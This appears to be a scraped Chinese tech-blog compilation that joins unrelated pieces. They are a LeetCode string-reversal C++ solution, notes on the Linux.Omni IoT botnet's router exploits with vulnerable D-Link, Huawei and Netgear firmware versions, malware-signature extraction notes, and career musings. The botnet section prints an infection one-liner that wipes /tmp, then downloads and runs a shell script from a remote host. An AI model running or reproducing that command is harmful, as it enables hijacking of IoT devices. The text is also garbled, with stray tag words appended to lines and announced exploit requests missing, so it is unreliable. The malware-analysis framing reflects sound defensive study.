https://leetcode.com/problems/reverse-string/html
編寫一個以字符串做爲輸入並逆轉字符串的函數。linux
字符串大於0,就從最末尾開始取值。ios
#include "pch.h" #include <stdio.h> #include <string> #include <iostream> #include <algorithm> using std::string; class Solution { public: string reverseString(string s) { string result = ""; for (int i =s.length()-1;i>=0 ; i--) { result += s.at(i); } return result; } }; int main() { // 使用內容 Solution nSolution; nSolution.reverseString("abcdef"); }
Linux下針對IoT威脅的分類和分析。算法
使用什麼方式對IOT設備進行攻擊。安全
Linux.Omni因其感染庫包含了許多漏洞(總共11種)bash
利用的IoT設備漏洞cookie
VACRON網絡錄像機中"board.cgi"參數存在代碼注入的漏洞。網絡
經過對路由器「cgi-bin/」目錄進行GET請求而進行的遠程代碼執行攻擊。函數
IoTReaper使用的是hedwig.cgi參數cookie溢出的漏洞,Omni使用的則是UPnP端口漏洞。工具
Omni的POST請求以下:
咱們能夠找到對應的二進制命令:
存在漏洞的固件版本是:
DIR-300 rev B – 2.14b01,
DIR-600 – 2.16b01,
DIR-645 – 1.04b01,
DIR-845 – 1.01b02,
DIR-865 – 1.05b03。
與「/language/Swedish」資源相關聯,容許遠程執行代碼。
經過CAPTCHA繞過登陸,並容許外部攻擊者執行遠程代碼。
D-Link路由器有此漏洞的版本:
DI-524 C1 3.23,
DIR-628 B2 1.20NA1.22NA,
DIR-655 A1 1.30EA
漏洞利用以下:
二進制中的指令:
在華爲HG532路由器中,能夠經過修改HTTP請求來利用配置文件驗證錯誤的漏洞。
此漏洞已在分析Okiru/Satori僵屍網絡的文章中(Analysis of Linux.Okiru)被檢測及分析。
Netgear路由器DGN1000 1.1.00.48固件中存在容許遠程執行代碼而無需事先驗證的漏洞。
使用Realtek SDK和miniigd守護程序的不一樣設備都存在經過UPnP SOAP接口的命令注入漏洞。
GPON路由器的最新漏洞
儘管攻擊方式多種多樣, 在受感染設備上運行的命令是一致的:
cd /tmp;rm -rf *;wget http://%s/{marcaDispositivo};sh /tmp/{marcaDispositivo}
下載的文件是bash腳本,它依據受感染設備的不一樣構架來下載樣本。
網絡安全設備報警,某臺機器中毒。
如何快速找到機器裏的惡意代碼相關進程、文件。
經過搜索國內外惡意代碼公開的分析報告,分析樣本,提取行爲特徵。
逆向分析收集到的樣本,而後提取規則:
文件規則:文件路徑、Yara規則
註冊表:註冊表路徑、子項、類型、值
內存:內存特徵碼、內存類型、內存保護屬性、內存塊大小範圍
遍歷內存代碼:
【惡意代碼】惡意代碼代碼特徵提取 https://www.cnblogs.com//17bdw/p/10181207.html
只須要搞懂兩個知識點:VirtualQueryEx使用、MEMORY_BASIC_INFORMATION 結構體中RegionSize字段的含義。
利用技術變現思路。
在長時間加班狀況下,如何保持學習。
以爲仍是要從頭至尾看完一本書,不容易被分神。
白天工做回家就不想動了。
【技術思路】極客時間-左耳聽風-開篇詞1
http://www.javashuo.com/article/p-pbmkicar-gp.html
用技術變現:
獨立思考 保持學習力、洞察力 尋找合適的環境 具有動手能力。 關注技術付費點 善於提高經驗 輸出價值觀 朋友圈 擁有技術領導力